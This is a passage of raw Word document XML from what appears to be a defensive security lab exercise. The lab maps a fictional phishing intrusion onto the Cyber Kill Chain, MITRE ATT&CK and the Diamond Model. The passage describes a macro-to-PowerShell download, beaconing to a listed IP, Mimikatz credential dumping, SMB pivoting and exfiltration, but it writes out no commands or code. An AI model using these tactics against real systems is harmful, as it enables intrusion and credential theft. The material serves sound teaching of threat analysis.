                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2375555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — The scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; A finance department user opens an invoice attachment from alerts@secur1ty-paypal.com (Lab 8). A macro spawns PowerShell, which downloads a second stage from 185.220.101.45. The second stage establishes a 60-second heartbeat to the same IP. Over the next 48 hours the attacker dumps credentials with Mimikatz, pivots via SMB to a file server, and exfiltrates 1 GB over HTTPS to a Dropbox-style domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Map to the 7 stages of the Lockheed Cyber Kill Chain</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>What happened</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IOC / artefact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1. Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Attacker harvested LinkedIn finance contacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OSINT (Lab 19)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>2. Weaponisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Excel macro + downloader built</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hash of .xlsm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3. Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phishing email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>From / Return-Path mismatch (Lab 8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4. Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Macro runs PowerShell on click</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Office → PowerShell parent/child</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5. Installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Second stage persists via scheduled task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>New entry in schtasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6. Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>60 s beacon to 185.220.101.45</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Beaconing pattern (Lab 4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7. Actions on Objectives</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Credential theft + 1 GB exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Mimikatz IOCs, traffic spike</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Pick one stage as the earliest detection opportunity — that becomes the "earliest kill" recommendation in the incident report (Lab 27).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Open MITRE ATT&amp;CK Navigator</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Browser: https://mitre-attack.github.io/attack-navigator/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Click Create New Layer → Enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Tag the techniques used in the scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In the search box, find and select each of these. For each, click the technique → set Score = 1 and Comment = scenario step:</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ATT&amp;CK ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Scenario step</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1566.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phishing: Spearphishing Attachment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>3. Delivery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1204.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>User Execution: Malicious File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4. Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4. Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1105</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>4–5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1053.005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Scheduled Task/Job: Windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>5. Installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1071.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>App Layer Protocol: Web</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>6. C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1003.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OS Credential Dumping: LSASS Memory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7. Actions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1021.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Remote Services: SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7. Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Exfiltration Over C2 Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7. Exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Use the Background colour scale to heat-map the layer. Export with Download as JSON or SVG and attach to the incident report.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Diamond Model of Intrusion Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fill in the four corners of the diamond:</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xml:space="preserve">                  │ Adversary  │  TA505-like cluster (TTPs match)</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xml:space="preserve">        │                                │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>┌───────┴───────┐               ┌────────┴───────┐</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│ Capability    │               │ Infrastructure │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│ Macro+PoShell │               │ 185.220.101.45 │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>│ Mimikatz      │               │ paypa1-domain   │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>└───────────────┘               └────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
